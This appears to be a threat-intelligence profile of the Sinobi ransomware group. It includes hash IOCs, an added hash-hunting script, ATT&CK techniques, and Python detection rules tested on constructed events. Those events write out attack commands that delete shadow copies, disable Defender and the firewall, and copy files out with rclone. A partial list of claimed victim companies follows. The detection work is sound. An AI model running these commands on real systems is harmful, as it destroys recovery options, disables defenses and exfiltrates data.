sinobi
Ransomware group profile
Description
Sinobi is a financially motivated threat group that employs a hybrid Ransomware-as-a-Service (RaaS) model. Emerging in mid-2025, it is characterized by a disciplined approach to attacks, extensive operational security, and a focus on stealth through living-off-the-land techniques.
Key insights
- Uses a double-extortion model, threatening to publish stolen data if the ransom is not paid.
- Initial access is most often gained with stolen VPN or Remote Desktop Protocol (RDP) credentials, or by exploiting known vulnerabilities.
- Employs evasion tactics that include disabling endpoint protection and modifying firewall configurations, and exfiltrates data with legitimate tools such as Rclone.
- Has been linked to the earlier Lynx and INC groups through code overlaps and operational similarities.
- Targets a diverse range of sectors, with notable attacks on healthcare and manufacturing organizations.
Intelligence
IOCs, YARA/Sigma rules, and related families for sinobi. The indicators listed here are file hashes; SHA-256, SHA-1 and MD5 values are mixed together, and the digest type is identified by hex length:
- deea481121129d4779195e93fdc39ae62fecb168fd5a384d0ccf8082f06092e5 (SHA-256)
- 39300863bcaad71e5d4efc9a1cae118440aa778f (SHA-1)
- 6bc8e3505d9f51368ddf323acb6abc49 (MD5)
- d520d06d78afcad2e03842cb8db4622d18b92739e89dfb8dadf5743f30dcd903 (SHA-256)
- dcb0e301261b81e5888c0ba6a8ce887b8ed52e5d (SHA-1)
- e75e5778e71e062ce4a7af673f0b2513854d2367fee0f01a26c0c998863bdf6e (SHA-256)
- a768244ca664349a6d1af84a712083c0 (MD5)
- 1b2a1e41a7f65b8d9008aa631f113cef36577e912c13f223ba8834bbefa4bd14 (SHA-256)
- eae09889399fe4fb8e78b114dba0527de913d12fb1802944a88ed136e3e90577 (SHA-256)
- d4919a7402d7ae02516589fbdfb3cc436749544052843a37b5d36ac4b7385b18 (SHA-256)
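Because the list above mixes three digest types, a hunt script has to classify each IOC before it can compare anything. The script below is an added example written for this page, not tooling from the page or from any vendor: it sorts the page's hashes by hex length, hashes each file once per algorithm in a single pass, and reports matches. The directories it walks are whatever the caller passes on the command line, and the in-memory data used to exercise it is constructed and unrelated to any real sample.

```python
import hashlib
import io
import os
import sys

# File-hash IOCs exactly as listed on this page (SHA-256, SHA-1 and MD5 mixed together).
PAGE_IOCS = [
    "deea481121129d4779195e93fdc39ae62fecb168fd5a384d0ccf8082f06092e5",
    "39300863bcaad71e5d4efc9a1cae118440aa778f",
    "6bc8e3505d9f51368ddf323acb6abc49",
    "d520d06d78afcad2e03842cb8db4622d18b92739e89dfb8dadf5743f30dcd903",
    "dcb0e301261b81e5888c0ba6a8ce887b8ed52e5d",
    "e75e5778e71e062ce4a7af673f0b2513854d2367fee0f01a26c0c998863bdf6e",
    "a768244ca664349a6d1af84a712083c0",
    "1b2a1e41a7f65b8d9008aa631f113cef36577e912c13f223ba8834bbefa4bd14",
    "eae09889399fe4fb8e78b114dba0527de913d12fb1802944a88ed136e3e90577",
    "d4919a7402d7ae02516589fbdfb3cc436749544052843a37b5d36ac4b7385b18",
]

# Hex-digest length identifies the algorithm for the three types common in TI feeds.
HASH_LENGTHS = {32: "md5", 40: "sha1", 64: "sha256"}


def classify_hash(value):
    """Return 'md5', 'sha1' or 'sha256' for a hex digest of matching length, else None."""
    v = value.strip().lower()
    algo = HASH_LENGTHS.get(len(v))
    if algo is None or any(c not in "0123456789abcdef" for c in v):
        return None
    return algo


def build_ioc_index(values):
    """Group IOC strings by algorithm; rejects anything that is not a recognised hash."""
    index = {"md5": set(), "sha1": set(), "sha256": set()}
    for v in values:
        algo = classify_hash(v)
        if algo is None:
            raise ValueError(f"not a recognised file hash: {v!r}")
        index[algo].add(v.strip().lower())
    return index


def digest_stream(fileobj, algos, chunk_size=1 << 20):
    """Compute several digests of one stream in a single pass (files may be large)."""
    hashers = {a: hashlib.new(a) for a in algos}
    for chunk in iter(lambda: fileobj.read(chunk_size), b""):
        for h in hashers.values():
            h.update(chunk)
    return {a: h.hexdigest() for a, h in hashers.items()}


def digest_bytes(data, algos=("md5", "sha1", "sha256")):
    """Convenience wrapper for in-memory data (constructed inputs, self-tests)."""
    return digest_stream(io.BytesIO(data), algos)


def match_digests(digests, index):
    """Return (algorithm, digest) pairs that appear in the IOC index."""
    return [(a, d) for a, d in digests.items() if d in index.get(a, ())]


def scan_paths(roots, index):
    """Walk each root directory and return {path: [(algo, digest), ...]} for IOC hits."""
    hits = {}
    algos = [a for a, s in index.items() if s]  # only hash with algorithms we hold IOCs for
    for root in roots:
        for dirpath, _, files in os.walk(root):
            for name in files:
                path = os.path.join(dirpath, name)
                try:
                    with open(path, "rb") as f:
                        digests = digest_stream(f, algos)
                except OSError:
                    continue  # unreadable or vanished file: skip rather than abort the scan
                matches = match_digests(digests, index)
                if matches:
                    hits[path] = matches
    return hits


if __name__ == "__main__":
    ioc_index = build_ioc_index(PAGE_IOCS)
    for path, matches in scan_paths(sys.argv[1:] or ["."], ioc_index).items():
        for algo, digest in matches:
            print(f"IOC MATCH {path} {algo}={digest}")
```

Run it as `python hunt.py C:\ProgramData C:\Users` (or any directory list). Hash IOCs are brittle by nature: a recompiled or padded payload gets a new digest, so treat a hit as high-confidence and a miss as no information, and pair this with the behavioural detections for the techniques listed further down.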
TTPs & Attack Vectors
Tools, initial access, and MITRE ATT&CK techniques for sinobi
| Technique ID | Name |
|---|---|
| T1070 | Indicator Removal |
| T1562.001 | Impair Defenses: Disable or Modify Tools |
| T1059.001 | Command and Scripting Interpreter: PowerShell |
| T1486 | Data Encrypted for Impact |
| T1490 | Inhibit System Recovery |
| T1021.001 | Remote Services: Remote Desktop Protocol |
| T1543.003 | Create or Modify System Process: Windows Service |
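Several of these techniques leave a characteristic process-creation footprint that does not depend on file hashes. The rules below are an added example written for this page, not detection content from the page or from any vendor: they encode the generic, publicly documented command lines for T1490 (vssadmin, wmic, bcdedit, wbadmin), T1562.001 (Set-MpPreference, netsh advfirewall), T1059.001 (hidden or encoded PowerShell) and the Rclone exfiltration named in the key insights, and run them over constructed Sysmon-style events. The command lines are the standard forms of each technique rather than Sinobi-specific samples from the page, the Rclone rule carries no ATT&CK ID because the page gives none, and every host, user and path is invented.

```python
import re
from collections import defaultdict

# Constructed process-creation events (Sysmon Event ID 1 / Security 4688 style).
# Hosts, users and paths are invented; this is not real telemetry.
SAMPLE_EVENTS = [
    {"host": "ws01", "user": "CORP\\jdoe", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe list shadows"},                                   # benign admin use
    {"host": "srv02", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},                     # T1490
    {"host": "srv02", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\bcdedit.exe",
     "cmdline": "bcdedit /set {default} recoveryenabled no"},                    # T1490
    {"host": "srv02", "user": "CORP\\svc_backup",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -nop -w hidden -c "Set-MpPreference -DisableRealtimeMonitoring $true"'},
    {"host": "srv02", "user": "CORP\\svc_backup", "image": r"C:\Windows\System32\netsh.exe",
     "cmdline": "netsh advfirewall set allprofiles state off"},                 # T1562.001
    {"host": "srv03", "user": "CORP\\svc_backup", "image": r"C:\ProgramData\rclone.exe",
     "cmdline": "rclone.exe copy D:\\Finance remote:bucket/finance --transfers 32"},  # Rclone exfil
    {"host": "ws04", "user": "CORP\\asmith",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -File C:\\Scripts\\inventory.ps1"},             # benign PowerShell
]

# (technique, rule name, image-basename regex, command-line regex); all case-insensitive.
RULES = [
    ("T1490", "Shadow copies deleted via vssadmin", r"^vssadmin\.exe$", r"delete\s+shadows"),
    ("T1490", "Shadow copies deleted via wmic", r"^wmic\.exe$", r"shadowcopy.*\bdelete\b"),
    ("T1490", "Recovery disabled via bcdedit", r"^bcdedit\.exe$",
     r"recoveryenabled\s+no|bootstatuspolicy\s+ignoreallfailures"),
    ("T1490", "Backup catalog deleted via wbadmin", r"^wbadmin\.exe$", r"delete\s+catalog"),
    ("T1562.001", "Defender real-time monitoring disabled", r"^(powershell|pwsh)\.exe$",
     r"set-mppreference.*disablerealtimemonitoring\s+\$?true"),
    ("T1562.001", "Windows Firewall disabled via netsh", r"^netsh\.exe$",
     r"advfirewall\s+set\s+\w+\s+state\s+off"),
    ("T1059.001", "Hidden or encoded PowerShell", r"^(powershell|pwsh)\.exe$",
     r"-(enc|encodedcommand|e)\b|-w(indowstyle)?\s+hidden"),
    # The page names the tool but no ATT&CK ID for the exfiltration step, so none is claimed here.
    ("Exfiltration (Rclone)", "Rclone copy/sync/move", r"^rclone\.exe$", r"\b(copy|sync|move)\b"),
]
COMPILED = [(t, n, re.compile(i, re.I), re.compile(c, re.I)) for t, n, i, c in RULES]


def basename(path):
    """Last path component, lower-cased, accepting either slash style."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(events):
    """Run every rule over every event and return one alert per (event, rule) match."""
    alerts = []
    for ev in events:
        image = basename(ev["image"])
        for technique, name, image_re, cmd_re in COMPILED:
            if image_re.search(image) and cmd_re.search(ev["cmdline"]):
                alerts.append({"host": ev["host"], "user": ev["user"], "technique": technique,
                               "rule": name, "cmdline": ev["cmdline"]})
    return alerts


def hosts_with_chained_techniques(alerts, minimum=2):
    """Hosts on which at least `minimum` distinct techniques fired.

    A lone vssadmin hit may be an administrator; recovery inhibition plus
    defence evasion on the same host is the pre-encryption staging pattern
    that justifies paging someone.
    """
    seen = defaultdict(set)
    for a in alerts:
        seen[a["host"]].add(a["technique"])
    return sorted(host for host, techs in seen.items() if len(techs) >= minimum)


if __name__ == "__main__":
    found = evaluate(SAMPLE_EVENTS)
    for a in found:
        print(f"{a['host']:6} {a['technique']:22} {a['rule']}: {a['cmdline']}")
    print("hosts with chained techniques:", hosts_with_chained_techniques(found))
```

The image match anchors on the basename, so it survives the binary being dropped in an unusual directory but not being renamed; a renamed Rclone only shows up through its original filename in PE metadata or through a hash match, which is why the hash IOCs above and these behavioural rules belong in the same hunt. The per-host chaining is deliberately simple (distinct techniques, no time window); in production, bound it to a window of minutes so two unrelated admin actions a week apart do not page.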
Victims (200 listed; first 20 shown)
| Company | Domain | Country | Industry | Status | Discovered |
|---|---|---|---|---|---|
| Neurotrials Research Inc | — | United States | Healthcare | Claimed | 26 days ago |
| Scales and Associates Inc | — | United States | Professional Services | Claimed | 29 days ago |
| Unre3d | — | China | Technology | Claimed | 29 days ago |
| Bay State Land Services | — | United States | Other | Claimed | 29 days ago |
| Celeris Networks | — | United States | Technology | Claimed | 29 days ago |
| Positiwise Infotech Pvt | — | India | Technology | Claimed | 29 days ago |
| Amerinational Management Services (AMS) | ourams.com | United States | Professional Services | Claimed | 3 months ago |
| Elgi Electric & Industries | elgielectric.com | India | Manufacturing | Claimed | 3 months ago |
| Interpack Northwest | interpacknorthwest.com | United States | Other | Claimed | 3 months ago |
| Summa Energy | summaenergy.com | United States | Energy & Utilities | Claimed | 3 months ago |
| Teco | teco.com | United States | Energy & Utilities | Claimed | 3 months ago |
| McAfee Tool & Die | mcafeetool.com | United States | Manufacturing | Claimed | 3 months ago |
| Eco Sound Builders | ecosoundbuilders.com | United States | Other | Claimed | 3 months ago |
| Graymatter | graymatter.com | United Kingdom | Technology | Claimed | 3 months ago |
| Iblesoft | iblesoft.com | United States | Technology | Claimed | 3 months ago |
| Mayfair Hotels & Resorts | mayfairhotels.com | India | Hospitality | Claimed | 3 months ago |
| Gentegra | gentegra.com | United States | Technology | Claimed | 3 months ago |
| Electriduct | electriduct.com | United States | Manufacturing | Claimed | 3 months ago |
| Saltech Systems | saltechsystems.com | United States | Technology | Claimed | 3 months ago |
| The Sundher Group | sundhergroup.com | Canada | Other | Claimed | 4 months ago |
Affected countries (56)
Countries where this group has been reported to target or leak victims.